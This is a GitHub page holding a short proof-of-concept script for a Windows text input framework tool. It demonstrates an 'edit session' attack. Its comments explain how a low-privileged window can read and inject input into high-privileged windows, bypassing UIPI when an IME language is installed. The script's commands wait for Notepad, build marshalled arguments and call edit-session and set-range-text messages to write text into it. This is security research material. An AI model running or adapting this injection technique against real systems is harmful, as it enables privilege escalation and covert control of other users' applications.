-
Notifications
You must be signed in to change notification settings - Fork 270
/
Copy pathctf-demo-editsession.ctf
46 lines (33 loc) · 1021 Bytes
/
ctf-demo-editsession.ctf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
# This script demonstrates what I call the "edit session" attack.
#
# A low privileged window can read the content of and send input to high
# privileged windows, defeating UIPI. At the present time, this only
# works when a language that requires an IME (or technically, an out-of-process
# text input processor) is installed.
#
# This script doesn't do it, but even if it's not selected a CTF client
# can change the active input profile, so just having the language installed
# is enough.
#
# vim: syntax=sh
connect
print "Set your language to Chinese (or other IME language) and start Notepad..."
wait notepad.exe
setarg 7
# edit cookie
setarg 0x1 0100000001000000
# RANGE { START LENGTH }
setarg 0x1 0000000000000000
setarg 0x201 0
# NEW LENGTH
setarg 0x201 11
# Element count for the array.
setarg 0x201 16
# pchData
setarg 0x25 L"TestSetRangeText"
# dwFlags
setarg 0x201 0
# create session note: sessions timeout quickly!
call 0 MSG_REQUESTEDITSESSION 1 1 0
# start session
marshal 0 MSG_SETRANGETEXT